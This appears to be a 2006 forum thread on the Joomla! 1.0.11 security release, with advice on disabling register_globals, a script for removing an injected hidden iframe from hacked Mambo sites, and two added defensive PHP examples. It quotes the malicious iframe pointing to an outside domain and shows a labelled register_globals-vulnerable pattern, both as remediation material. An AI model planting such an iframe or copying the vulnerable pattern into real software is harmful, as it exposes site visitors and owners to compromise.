This is a critical level announcement of Joomla.org!
Joomla! 1.0.11 [ Sunbird ] is now available as of Monday 28th August 2006 24:00 UTC for download here, and is being designated a Critical Security Release.
All existing Joomla! users MUST UPGRADE to this version, due to several High Level vulnerabilities that affect ALL Previous versions of Joomla!
1.0.11 contains the following critical security fixes:
* 04 High Level Security Fixes
* 04 Medium Level Security Fixes
* 18 Low Level Security Fixes
* 25 General bug fixes
If you are using ANY previous version of Joomla!, you need to upgrade to 1.0.11 as soon as possible.
Project Joomla! is and has always been fully committed to a Security First Principle and new initiatives have and will continue to be started to reinforce and continue this principle. Joomla! 1.0.11 highlights a redoubled effort to put Security at the forefront of everyone's lexicon.
IMPORTANT LINKS:
http://forum.joomla.org/index.php/topic,81058.0.html
http://www.joomla.org/content/view/1843/74/
http://forum.joomla.org/index.php/topic,89866.0.html
http://forum.joomla.org/index.php/topic,86525.0.html
Just like last time, it is imperative that you upgrade/patch your Joomla installs immediately to avoid the risk of having your site compromised.
If you have any questions, please post them here.
I've sent a notice on this and the other recent security releases to all clients:
http://www.charlottezweb.com/forums/index.php?topic=531.0
I'm backing up the directories/files that will be upgraded now.
I'll be upgrading immediately after that.
Quote from: chilly on August 29, 2006, 11:15:55 AM
I'm backing up the directories/files that will be upgraded now.
Yes, it's ALWAYS rule #1 to backup first! 8)
alright, I'm done, but I got this message in the Admin center:
Following PHP Server Settings are not optimal for Security and it is recommended to change them:
* PHP register_globals setting is `ON` instead of `OFF`
* Joomla! RG_EMULATION setting is `ON` instead of `OFF` in file globals.php
`ON` by default for compatibility reasons
Please check the Official Joomla! Server Security post for more information.
There is nothing in that post regarding this that I can see on how to turn register_globals to OFF
Help? Thanks :)
That's a server-wide setting.
You can override it for your account by creating a php.ini file within your site space.
http://www.charlottezweb.com/forums/index.php?topic=393.0
Quote from: chilly on August 29, 2006, 01:39:03 PM
* PHP register_globals setting is `ON` instead of `OFF`
* Joomla! RG_EMULATION setting is `ON` instead of `OFF` in file globals.php
`ON` by default for compatibility reasons
To followup on this...
I just fixed this on one site.
Create a php.ini file with the following line and upload it into public_html:
register_globals = 0
Then there's a file called globals.php already in your joomla folder.
Search for:
define( 'RG_EMULATION', 1 );
and change the 1 to 0:
define( 'RG_EMULATION', 0 );
That should do it.
-------
edit: I had the rg_emulation values backwards
-------
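An added illustration (not code from this thread or from Joomla!) of why the register_globals / RG_EMULATION warning matters and how to write PHP that is safe with the directive either way. The page logic, $is_admin, $task and register_globals_enabled() are hypothetical.

```php
<?php
// Added example, not code from the thread or from Joomla!. Shows the risk behind
// the register_globals = ON warning above and the habits that neutralise it.
// The page logic and variable names are hypothetical.
session_start();

// --- Risky pattern (assume register_globals = On or RG_EMULATION = 1) ---
// $is_admin is assigned only on the success path. With register_globals on,
// a request such as page.php?is_admin=1 pre-creates $is_admin in global
// scope, so the "uninitialised" variable is already truthy when tested.
if (isset($_SESSION['user']['role']) && $_SESSION['user']['role'] === 'admin') {
    $is_admin = true;
}
if (!empty($is_admin)) {
    // admin-only work
}

// --- Hardened version: correct whether register_globals is On or Off ---
// 1. Initialise every variable before it is tested.
$is_admin = false;
// 2. Read input only from the explicit superglobals, never from a bare $name.
$task = isset($_REQUEST['task']) ? (string) $_REQUEST['task'] : '';
// 3. Derive privilege from server-side state only.
if (isset($_SESSION['user']['role']) && $_SESSION['user']['role'] === 'admin') {
    $is_admin = true;
}
if ($is_admin && $task === 'purge_cache') {
    // admin-only work
}

// 4. Detect at runtime if the hosting config regressed to register_globals = On
//    (ini_get() returns '', '0' or false when the directive is off or absent).
function register_globals_enabled() {
    $v = strtolower((string) ini_get('register_globals'));
    return in_array($v, array('1', 'on', 'yes', 'true'), true);
}
if (register_globals_enabled()) {
    trigger_error('register_globals is On: set register_globals = 0 in php.ini', E_USER_WARNING);
}
// Joomla! 1.0.x re-creates the same behaviour in PHP via RG_EMULATION in
// globals.php; the fix quoted above is define('RG_EMULATION', 0); there.
```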
Dear Mambo users,
(Standard CYA Disclaimer: I offer zero guarantees that this is going to work for you; if you follow any of my instructions please take the time to research the repercussions of their actions. I provide this information as a guide only - that being said, this worked beautifully for my hacked Mambo installation)
I'm tackling either this or a similar vulnerability in Mambo as well....
1) Ensure php is configured to have register globals off
2) in configuration.php...
<?php
//change this....
$mosConfig_register_globals = '1';
//to...
$mosConfig_register_globals = '0';
?>
3) Ensure there are no writable php/html files within your document root that aren't required.
Now, a lot of my Mambo html files have some crazy iFrame appended to them... the iframe's source was o00o.info/portal/....... I removed everything recursively by modifying a script I found on the Mambo board... this worked to remove the injected code that my Mambo site was suffering from, you may need to modify it for your own specific symptoms...
<?php
ini_set('memory_limit', '256M');
ini_set('display_errors', 'on');
/**
 * Script used to restore compromised files
 */
define('_VALID_MOS', true);
echo 'Task started at: ' . date('H:i:s d-m-Y') . "\n";
// Every index.* file below the document root, recursively, with full paths
$files = @mosReadDirectory('/var/www/testing.perfectpalletspostpress.com/', 'index.*', true, true);
echo '<pre>';
//print_r($files);
$k = 0;
for ($i = 0, $n = count($files); $i < $n; $i++) {
    $file = $files[$i];
    $f_content = @file_get_contents($file);
    // Only files that reference the injected domain are touched
    if (preg_match('#o00o#is', $f_content)) {
        echo "infected:" . $file . "\n";
        $f_content = str_replace('<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>', '', $f_content);
        $fp = fopen($file, 'w');
        // fopen() returns false if the file is not writable; fwrite() returns false on error
        if ($fp === false || fwrite($fp, $f_content) === false) {
            echo "failed to fix file:" . $file . "\n";
        }
        if ($fp !== false) {
            fclose($fp);
        }
        $k++;
    }
}
echo "infected files processed: " . $k . "\n";

/**
 * Utility function to read the files in a directory
 * @param string The file system path
 * @param string A filter for the names
 * @param boolean Recurse search into sub-directories
 * @param boolean True if to prepend the full path to the file name
 */
function mosReadDirectory( $path, $filter='.', $recurse=false, $fullpath=false ) {
    $arr = array();
    if (!@is_dir( $path )) {
        return $arr;
    }
    $handle = opendir( $path );
    // Compare against false explicitly so an entry named "0" does not end the loop
    while (($file = readdir($handle)) !== false) {
        $dir = mosPathName( $path.'/'.$file, false );
        $isDir = is_dir( $dir );
        if (($file != ".") && ($file != "..")) {
            if (preg_match( "/$filter/", $file )) {
                if ($fullpath) {
                    $arr[] = trim( mosPathName( $path.'/'.$file, false ) );
                } else {
                    $arr[] = trim( $file );
                }
            }
            if ($recurse && $isDir) {
                $arr2 = mosReadDirectory( $dir, $filter, $recurse, $fullpath );
                $arr = array_merge( $arr, $arr2 );
            }
        }
    }
    closedir($handle);
    asort($arr);
    return $arr;
}

/**
 * Function to strip additional / or \ in a path name
 * @param string The path
 * @param boolean Add trailing slash
 */
function mosPathName($p_path, $p_addtrailingslash = true) {
    $retval = "";
    $isWin = (substr(PHP_OS, 0, 3) == 'WIN');
    if ($isWin) {
        $retval = str_replace( '/', '\\', $p_path );
        if ($p_addtrailingslash) {
            if (substr( $retval, -1 ) != '\\') {
                $retval .= '\\';
            }
        }
        // Remove double \\
        $retval = str_replace( '\\\\', '\\', $retval );
    } else {
        $retval = str_replace( '\\', '/', $p_path );
        if ($p_addtrailingslash) {
            if (substr( $retval, -1 ) != '/') {
                $retval .= '/';
            }
        }
        // Remove double //
        $retval = str_replace('//', '/', $retval);
    }
    return $retval;
}
?>
Good Luck,
Dave Ariens
Lewis Media Inc.
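An added example that generalises Dave's clean-up (it is not his script and not Mambo/Joomla! code): instead of matching one exact injected string it flags any hidden zero-size iframe, backs a file up before rewriting it, and only reports unless $fix is set. The placeholder host, the $root path and the .bak suffix are assumptions.

```php
<?php
// Added example, not Dave's script and not Mambo/Joomla! code. Flags any hidden
// (zero-size) iframe rather than one exact string, keeps a .bak copy before
// rewriting, and defaults to report-only. Sample host and paths are hypothetical.

// One hidden iframe, optionally wrapped in the <html>...</html> seen in the thread;
// matches width=0 or height=0 (quoted or bare) anywhere inside the tag.
define('HIDDEN_IFRAME_RE',
    '#(?:<html>\s*)?<iframe\b[^>]*\b(?:width|height)\s*=\s*["\']?0(?=["\'\s/>])[^>]*>\s*</iframe>(?:\s*</html>)?#is');

// Injected fragments found in $content; an empty array means the file is clean.
function find_hidden_iframes($content) {
    return preg_match_all(HIDDEN_IFRAME_RE, $content, $m) ? $m[0] : array();
}

// $content with every hidden iframe removed.
function strip_hidden_iframes($content) {
    return preg_replace(HIDDEN_IFRAME_RE, '', $content);
}

// Walk $root; return path => fragments for each infected .php/.htm/.html file.
// With $fix = true, copy the original to <file>.bak, then write the cleaned content.
function scan_tree($root, $fix = false) {
    $report = array();
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $path => $info) {
        if (!$info->isFile() || !preg_match('/\.(php|html?)$/i', $path)) {
            continue;
        }
        $content = file_get_contents($path);
        $hits = find_hidden_iframes($content);
        if (!$hits) {
            continue;
        }
        $report[$path] = $hits;
        if ($fix) {
            if (!copy($path, $path . '.bak')) {            // never rewrite without a backup
                echo "backup failed, skipped: $path\n";
            } elseif (file_put_contents($path, strip_hidden_iframes($content)) === false) {
                echo "failed to fix: $path\n";
            }
        }
    }
    return $report;
}

// Constructed sample in the shape Dave quoted, with a placeholder host (no disk access).
$sample = "<?php echo 'page'; ?>\n<html><iframe width=0 height=0 frameborder=0 "
        . "src=http://malicious.example/portal/index.php scrolling=no></iframe></html>\n";
echo count(find_hidden_iframes($sample)) . " hidden iframe(s) in sample\n";
echo strip_hidden_iframes($sample);
```

Run scan_tree('/path/to/docroot', false) first and review the report; only then repeat with $fix = true.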
Thanks for the post Dave! I was wondering if Mambo was going to release an update...they hadn't at the time that the Joomla one was.